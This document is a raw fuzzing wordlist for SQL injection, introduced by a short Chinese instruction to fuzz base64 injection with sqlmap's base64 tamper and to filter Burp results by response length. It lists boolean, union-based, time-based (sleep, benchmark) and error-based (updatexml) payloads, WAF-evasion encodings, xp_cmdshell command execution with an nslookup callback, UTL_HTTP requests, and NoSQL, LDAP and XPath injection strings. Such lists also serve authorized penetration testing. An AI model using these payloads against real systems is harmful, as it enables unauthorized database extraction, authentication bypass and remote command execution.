﻿1.这里我们还需要fuzz base64的注入判断,然后使用tamper的base64脚本跑一遍，最后使用bp爆破长度的正则查看结果
and 999=999
and 87997=2
9888
or 1=1
or 1=2
1.0or 1=1
1.0%26%26 1=1
/*!and*/1=1
/*!and*/1=2
0e-1and%0a1=1
0e-1and%0a1=2
0e-1and%0b1=1
0e-1and%0b1=2
or string(2)=string(2)
`
'
\'
\%00' select 1
1'or'1'='1
%bf%27
%27%bf
%df%5c
%bf\
-23
-1212
"
#
-
--
|| `id`
|| `flag`
|| `seck`
and `id`
and `seck`
||/**/`id`
and/**/`name`
and%0a`namne`
[$ne]=ewe
[$regex]=s
'%20--
--';
'%20;
=%20'
=%20;
=%20--
\x23
\x27
\x3D%20\x3B'
\x3D%20\x27
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or%20select *
admin'--
<>"'%;)(&+
'%20or%20''='
'%20or%20'x'='x
"%20or%20"x"="x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
"' or 1 --'"
admin';%00
adsa'='';%00
admin'or/**/'1'='1
admin'/**/or/**/'1'='1
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
" or 1=1 or ""="
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
&lt;&gt;&quot;'%;)(&amp;+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
and substring(//user[1]/username,1,1)=substring(//user[1]/password,1,1)
id[1]=1 and 1=1
id[1]=1 and 1=2
' and 1='1 #' and (select * from (select(sleep(5)))eJZD) and '1'='1
6%20or%20string(1)=string(1)
\x27 or updatexml(1,(concat(0x7e,(if(1,benchmark(5000000,sha1(1)),1)))),0)\x23
' or updatexml(1,(concat(0x7e,(if(1,benchmark(5000000,sha1(1)),1)))),0)#
or updatexml(1,user(),0)
' or updatexml(1,version(),0) || '1'='1
1' u%nion se%lect 1 
1' u%u006eion se%u006cect 1
1' unIoN SeLect 1 
1' union%0d%0aselect%0d%0a1
1' uni%00on sel%00ect 1 --+
-1 ord%00er b%00y 3 --+
1' union%a0select%a01 
1' union/**/select/**/1 
1' union/**)*/select/**)*/1 
1' union/*--*/select/*--*/1 
1'/*!5000union*//*!5000select*/1 
1' union all select 1 
1' union distinct select 1 
1' union distinctrow select 1 
1e1union select 1 //select user from mysql.user where user = 'root' and 1=1e1union select 1 
-3198' union ALL SELECT NULL,NULL,group_concat(table_name) from information_schema.tables where table_schema=database()-- -
id=-4166' UNION ALL SELECT NULL,NULL,CONCAT(0x7e,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x7e)-- - 
xx select xxx, 1e1from xxx //select user,password from mysql.user where user = 'root' and 1=1e1union select user,1e1from mysql.user; 
' or '1' or '
' or '1
JTI3
YW5kIDk5OT05OTg=
JyBvciAxPTE=
b3IlMjAxPTEgLS0=
JyUyMC0t

